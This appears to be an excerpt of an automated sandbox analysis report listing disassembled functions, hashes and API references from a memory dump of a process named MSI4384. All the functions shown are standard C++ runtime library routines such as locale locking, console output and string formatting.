                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 05e307a2aaa81329e3f1531711df3107642e6bcef26d6c2377c2ff919ec84427
                                                                    • Instruction ID: 67c17617a1b6a1ae889b341f27aaa8e5b62c81e70c58d17248ea8fccfb77e361
                                                                    • Opcode Fuzzy Hash: 05e307a2aaa81329e3f1531711df3107642e6bcef26d6c2377c2ff919ec84427
                                                                    • Instruction Fuzzy Hash: E80104719005299BCF04FFA5D8556EF7B60AF98718F10441EF510A7391DF7CAE008B89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043B108
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043B112
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043B163
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043B183
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: d973f5182ac890c6006b98effd716a5c55bd680f1b09918035e36dbc0fa1e92b
                                                                    • Instruction ID: c358495d3174fff155a41bd43beb636e8a4f8036888d9e4c5be73934cde53a57
                                                                    • Opcode Fuzzy Hash: d973f5182ac890c6006b98effd716a5c55bd680f1b09918035e36dbc0fa1e92b
                                                                    • Instruction Fuzzy Hash: B1010031A00229ABCB08EFA5D8556AE7760EF88758F24441FE510AB381DF789A008BC9
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0044531D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445327
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 00445378
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00445398
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 01747eb94b2d26c8aaa4fa938b4762b14a5f69b5fe4c8e8e899bf3f6e5c32e9f
                                                                    • Instruction ID: b42d2d4730126512722881b481fa87c9b76460b7d75e7c15efc1d91b78433cf9
                                                                    • Opcode Fuzzy Hash: 01747eb94b2d26c8aaa4fa938b4762b14a5f69b5fe4c8e8e899bf3f6e5c32e9f
                                                                    • Instruction Fuzzy Hash: E2010471A001159BDF04FFA5D855AAE7761BF84718F15441EE810AB392DFBC9E008B89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A4CF
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A4D9
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A52A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A54A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 7ef49e021a2ae7815f9932063dc787f4fc53df501814c29e0ecb4b760d3238b2
                                                                    • Instruction ID: 5e694c75c64ea98b6ea268e218bc631f2f820121877248b288261c4a5171d69b
                                                                    • Opcode Fuzzy Hash: 7ef49e021a2ae7815f9932063dc787f4fc53df501814c29e0ecb4b760d3238b2
                                                                    • Instruction Fuzzy Hash: 01010031900129ABCB04EFA5D845ABE7760AF88718F20041FE411AB381DF7C8E048B8E
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004454DC
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004454E6
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 00445537
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00445557
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 1cd1d17f4bce1bf228e6899359bcecca4434213c3dcc801d6c81ccd4a6eb4a56
                                                                    • Instruction ID: dc5e78b0b5339cf6eae02b0a2ee66139669a7fcd81e9ba2bd68777ea4d788a48
                                                                    • Opcode Fuzzy Hash: 1cd1d17f4bce1bf228e6899359bcecca4434213c3dcc801d6c81ccd4a6eb4a56
                                                                    • Instruction Fuzzy Hash: 7201E171A00129EBDB04EFA59841ABE7761AF88718F15441FE4106B386DF789E058B89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A564
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A56E
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A5BF
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A5DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 44c735584ad0a9460f6843cbdfefe5d9974a7948e5dc8905c1ac43b0361e7077
                                                                    • Instruction ID: a2fb1df3586cdecc8e23fe996424612a1be0f771607568a31112c55550b60b9e
                                                                    • Opcode Fuzzy Hash: 44c735584ad0a9460f6843cbdfefe5d9974a7948e5dc8905c1ac43b0361e7077
                                                                    • Instruction Fuzzy Hash: FC01E132900115AFCB04BFA5D8456AE7765AF88718F21441EE410A7382DF788A008B8A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00445571
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0044557B
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004455CC
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004455EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 9551f482f4887e9cd00432b056987db7eb5d514a235155d8b820ea9460cea3cc
                                                                    • Instruction ID: c3769aa36ef10475d1eeb7534d73d3d00613d6ce3f6dc1f3ce7c5abb01191ce2
                                                                    • Opcode Fuzzy Hash: 9551f482f4887e9cd00432b056987db7eb5d514a235155d8b820ea9460cea3cc
                                                                    • Instruction Fuzzy Hash: 1501407590052AABDF04FFA5D8516BE7771AF88718F20041FF400AB382CF389E008B89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AFDE
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AFE8
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043B039
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043B059
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 16c5e680db664f1cac6668fcb7707ac5c5600368fd317bb7339eedbea66951ca
                                                                    • Instruction ID: 42806b44d199c1c76bca995acc2de26076a4d0742178d5788f92d671d7e841a7
                                                                    • Opcode Fuzzy Hash: 16c5e680db664f1cac6668fcb7707ac5c5600368fd317bb7339eedbea66951ca
                                                                    • Instruction Fuzzy Hash: 65010031A001259BCB08FFA5D8816AE7775EF88B18F20441FE520AB391DF789A008BCD
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043662B
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00436636
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004366A4
                                                                      • Part of subcall function 00436787: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0043679F
                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00436651
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                    • String ID:
                                                                    • API String ID: 677527491-0
                                                                    • Opcode ID: 4fb22876eed366283aaa776701ac5f3ae59bf15953b1432762bb854c8b8d8572
                                                                    • Instruction ID: f05b3293e70b0dc998eee0d715d400eda776acb17377cde8b0e0d32f002e2729
                                                                    • Opcode Fuzzy Hash: 4fb22876eed366283aaa776701ac5f3ae59bf15953b1432762bb854c8b8d8572
                                                                    • Instruction Fuzzy Hash: 3001F1B4A01111ABCB05EF20D85557C3B61BF88748F06805EE81113381DF786E05CBCD
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A723
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • ctype.LIBCPMT ref: 0043A767
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A79E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
                                                                    • String ID:
                                                                    • API String ID: 3358926169-0
                                                                    • Opcode ID: eba1b7a9867ef4ccaa7228d9a2814260b0365c808710d758edcc5badc5bd8790
                                                                    • Instruction ID: 69acb73ce606b2ae1f729abbcb362fbc1cac5fcf65d92d272d59fd56f482d60a
                                                                    • Opcode Fuzzy Hash: eba1b7a9867ef4ccaa7228d9a2814260b0365c808710d758edcc5badc5bd8790
                                                                    • Instruction Fuzzy Hash: AFF0C231A4011996DB05FAA18896BAE3220AF48718F50441EF5106B2D2DF3C8A04878A
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000), ref: 00469BDE
                                                                    • GetLastError.KERNEL32(?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000,?,?,?,00468C31,00000000), ref: 00469BEA
                                                                      • Part of subcall function 00469BB0: CloseHandle.KERNEL32(FFFFFFFE,00469BFA,?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000,?,?), ref: 00469BC0
                                                                    • ___initconout.LIBCMT ref: 00469BFA
                                                                      • Part of subcall function 00469B71: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00469BA0,004694AE,?,?,0046868E,?,00000000,00000000,?), ref: 00469B84
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000,?), ref: 00469C0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 87c6784345d3c6a9de574eaad43356dae5a74664ccafd43340aa4529644ef545
                                                                    • Instruction ID: d6f92c97c9ef7b1de6080c1c4923880d90daefb7c8409f994d69aaa9bb270f31
                                                                    • Opcode Fuzzy Hash: 87c6784345d3c6a9de574eaad43356dae5a74664ccafd43340aa4529644ef545
                                                                    • Instruction Fuzzy Hash: B7F03036001115BBCF221F91EC04A9E3F6AFF087A0F044135FE0995130E6B28C20EBDA
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AB36
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AB40
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043AB7A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043ABB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
                                                                    • String ID:
                                                                    • API String ID: 3160146232-0
                                                                    • Opcode ID: 16e9ae9ecfa8679e89a650c1cd2314ff2b85d17a8bd1d1f7d1be40d87caaff0a
                                                                    • Instruction ID: 1b8239e390d337ba071a348faad5f74258875a7858d994bdedf4b480636f86cb
                                                                    • Opcode Fuzzy Hash: 16e9ae9ecfa8679e89a650c1cd2314ff2b85d17a8bd1d1f7d1be40d87caaff0a
                                                                    • Instruction Fuzzy Hash: B6F05E31E4011996DB05FFA1C852BAE7325EF44B19F41441EF5016B282DF7C9A14879A
                                                                    APIs
                                                                      • Part of subcall function 00468298: GetConsoleOutputCP.KERNEL32(F3E52339,00000000,00000000,?), ref: 004682FB
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00462C3F,?), ref: 00468CD4
                                                                    • GetLastError.KERNEL32(?,?,00462C3F,?,00462AD3,00000000,?,00000000,00462AD3,?,?,?,004803F8,0000002C,00462B44,?), ref: 00468CDE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                    • String ID: ?,F
                                                                    • API String ID: 2915228174-1996027060
                                                                    • Opcode ID: 1b73ee2f98516057932ade05ab17bd0dbf29615bbc3db5cd0b7da0d0a15fe197
                                                                    • Instruction ID: 3dc6afcf03e74ee0780eb8b79fa110847d9a6100919e13e07bbef75c22c53b3c
                                                                    • Opcode Fuzzy Hash: 1b73ee2f98516057932ade05ab17bd0dbf29615bbc3db5cd0b7da0d0a15fe197
                                                                    • Instruction Fuzzy Hash: CF61B8B1900119AFDF11DFA8D844AEF7BB9BF19304F14025EE900A7252EB79D901CB6A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: 37f56e9aaf89230ef3fcf8003387cfd60e131b6680a7a1660f99710377b415f8
                                                                    • Instruction ID: c186f301b01f646cb43fb0e6f4c180d547984c49da88cd2fcd2574818f92c2c7
                                                                    • Opcode Fuzzy Hash: 37f56e9aaf89230ef3fcf8003387cfd60e131b6680a7a1660f99710377b415f8
                                                                    • Instruction Fuzzy Hash: 5E717E71D00118AFEF18EFA8E881AEEB7F5EF48304F10452AF515A7251EB39AD51CB58
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: c9591d86f62903051bd244bcef87863f996147e69bc498357f1bdee80b58200a
                                                                    • Instruction ID: 94e3eb89c9a970eabff587143eda2acab60c0645081b2ab7879f1acb2e8e25e8
                                                                    • Opcode Fuzzy Hash: c9591d86f62903051bd244bcef87863f996147e69bc498357f1bdee80b58200a
                                                                    • Instruction Fuzzy Hash: 37716E71E01219AFEF15DFA8D881AEEB7B5BF08304F14052EF815A7342EA399D45CB58
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00434B91
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                      • Part of subcall function 0042C3C0: __Getctype.LIBCPMT ref: 0042C3CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$AllocGetctypeH_prolog3LocalLockit::_Lockit::~_
                                                                    • String ID: $9H$8H
                                                                    • API String ID: 3791111190-96789937
                                                                    • Opcode ID: a378b36a4291e6a567b6a5def2bdc34b83d989855aac2aa6e0c9e0be9131e4ef
                                                                    • Instruction ID: 818490f5e839ae66da509631a3c4a10c669fa9982c7d85ca0e3565b33e46f4eb
                                                                    • Opcode Fuzzy Hash: a378b36a4291e6a567b6a5def2bdc34b83d989855aac2aa6e0c9e0be9131e4ef
                                                                    • Instruction Fuzzy Hash: 71510BB1901215ABD7117FB28C42AFF7A68EF89354F50941FF90497282DB3CAD0087E9
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443647
                                                                    • _swprintf.LIBCMT ref: 004436BF
                                                                      • Part of subcall function 0043A71C: __EH_prolog3.LIBCMT ref: 0043A723
                                                                      • Part of subcall function 0043A71C: std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_LockitLockit::__swprintfstd::_
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 3614004578-1402515088
                                                                    • Opcode ID: 73411f2fc0a4316a245022b91df4a643e256ad7e9243c84b52907d559c8b69d4
